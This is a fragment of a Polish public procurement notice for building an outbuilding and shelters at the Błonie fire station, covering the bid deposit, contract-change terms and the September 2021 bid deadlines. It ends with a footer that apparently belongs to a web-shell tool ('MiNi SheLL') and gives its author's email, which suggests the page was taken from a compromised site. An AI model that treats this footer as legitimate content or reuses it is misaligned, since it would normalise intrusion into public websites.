postępowaniu<br/>potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez<br/>wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu<br/>wszystkich podmiotów.6. Dopuszcza się, aby wadium zostało wniesione przez pełnomocnika<br/>(lidera) lub jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z<br/>zastrzeżeniem ust. 7 niniejszego rozdziału SWZ.7. W przypadku wniesienia wadium w postaci<br/>niepieniężnej, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów<br/>Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować<br/>wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6<br/>ustawy Pzp, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.8. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem<br/>występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art. 455 ust. 1 ustawy Pzp, przewiduje możliwość dokonania zmian<br/>postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach<br/>określonych w § 20 projektu umowy stanowiącym załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-09 00:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">poprzez miniPortal zgodnie z instrukcją zawartą w rozdziale XXII SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Zamówienie jest udzielane w 2 częściach, z których;<br/>1)	I część zamówienia – Zagospodarowanie terenu w ramach inwestycji - Budowa budynku gospodarczego wraz z wiatami oraz zagospodarowaniem terenu, na podstawie art. 30 ust 4 ustawy Pzp. Część ta nie jest przedmiotem niniejszego zamówienia.<br/><br/>2)	II część zamówienia, jest tożsama z przedmiotem niniejszego zamówienia, tj wykonanie prac budowlanych związanych z budową budynku gospodarczego oraz dwóch wiat na działce nr 4/2 zlokalizowanej w Błoniu przy ul. Lesznowskiej przy istniejącym budynku Komendy Powiatowej Straży Pożarnej oraz budynku komory dymowej wraz ze ścieżką edukacyjną „Ognik”.<br/><br/>2. Zamawiający nie przewiduje możliwości składania ofert częściowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com